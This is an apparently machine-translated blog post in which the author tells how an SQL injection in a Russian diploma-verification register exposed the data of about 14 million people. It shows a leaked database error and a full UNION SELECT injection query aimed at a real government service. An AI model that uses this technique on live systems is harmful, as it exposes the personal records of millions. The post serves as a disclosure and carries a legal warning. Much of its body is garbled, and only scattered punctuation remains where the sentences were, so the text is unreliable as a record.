And so it will do ... or how the data of 14 million Russians were in my hands

Lonely evening, looking at my empty record book and realizing that the end was near, I again thought about how I could now pack a bag, or even just a backpack, put a shirt and shorts in there and dump it into a warm country. It would be good, but with a diploma, life is much better. In any case, they always say that to me.

I also often heard a lot of stories about people who came for interviews with honors from Moscow State University, but they didn’t understand their profession at all, and then they admitted at corporate events that they had bought a diploma.

But the times are different now, now the 21st century, the century of great opportunities, any employer who knows how to use the mouse and knows what the browser looks like on the desktop can check the diploma data. Each diploma that is issued by an educational institution is now registered in a single register, which everyone has access to through the website of the Federal Service for Supervision in Education and Science .
')

Warning: do not try to repeat the steps described in the publication and the like. Remember Art. 272 of the Criminal Code "Wrongful access to computer information."

To get information about the education document, simply fill out the form, move the slider, and click. You will either be shown information about the document, or they will say that there is no such thing (but it is still too early to blame the applicant for deception, is it not enough what could have happened).


Well, while I looked at this form, I decided to play with it. He led all kinds of nonsense, and bang - on the field in which 1 ' was entered, I get the following response:

<h2> </h2>
<p>SQLSTATE[42601]: Syntax error: 7 ERROR:  syntax error at or near "4"
LINE 6: ...me) = UPPER('1'')) AND (doc.education_level_id = '4') AND (U...
                                                             ^</p>

SQL Injection. , . , . , . .

, , , . , — .

, , SELECT . - , php-, .

, - :


, .

, , . - id. id=1, id=1024 , . , id (: ).

, . , , , , -. . .

- . , , , SELECT id, name, count, . , , , , , ? , ORDER BY. ?

ORDER BY , , . , — . . 55.

, , ? , MySQL, MySQL Version(), . :


JSON, :

PostgreSQL 9.1.2 on x86_64-alt-linux-gnu, compiled by x86_64-alt-linux-gcc (GCC) 4.5.3 20120111 (ALT Linux 4.5.3-alt1.M60C.1), 64-bit

, , ( ). . , :


:

"SELECT "doc".*, "doc_type"."type", "stat"."name" AS "status", "level"."name" AS "level", "rec"."name" AS "rec_name", "rec"."surname" AS "rec_surname", "rec"."patronymic" AS "rec_lastname" FROM "documents" AS "doc" LEFT JOIN "document_types" AS "doc_type" ON doc_type.id = doc.document_type_id LEFT JOIN "document_packages" AS "dp" ON doc.document_package_id = dp.id LEFT JOIN "documents_status" AS "stat" ON stat.id = doc.status_id LEFT JOIN "education_levels" AS "level" ON level.id = doc.education_level_id LEFT JOIN "recipients" AS "rec" ON rec.id = doc.recipient_id WHERE (dp.status = 3) AND (doc.organization_id = '573') AND (doc.year = '2018-01-01') AND (UPPER(rec.surname) = UPPER('1')) UNION SELECT 1,current_query(),'3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '01.01.1970', '01.01.1970', '21', '01.01.1970', '23', '24', '25', '26', '01.01.1970', '28', '29', '30', '31', '32', '33', '28-05-2004 11:11:59', '35', '36', '28-05-2004 11:11:59', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55' -- ')) AND (doc.education_level_id = '4') AND (UPPER(doc.series) = UPPER('1')) AND (doc.number = '1') LIMIT 1"

.

, :


. :


, , . :

(, , , , !, !!, ( , , !), , (?), , ), ( : ), (, , email, , , md5 , ), admin ( : , ), ( , email, , — , ) .

: 14 000 000 , 14 000 000 , 1322 , 1 , , , , 3391 . 5 .

, . , - ? , ip -? !

, ( , ). . , .

. , , md5, , , . - .

? ? , . , - …

UPD: , . , , . , , . , . , , , , . , - . : , , 3- , , .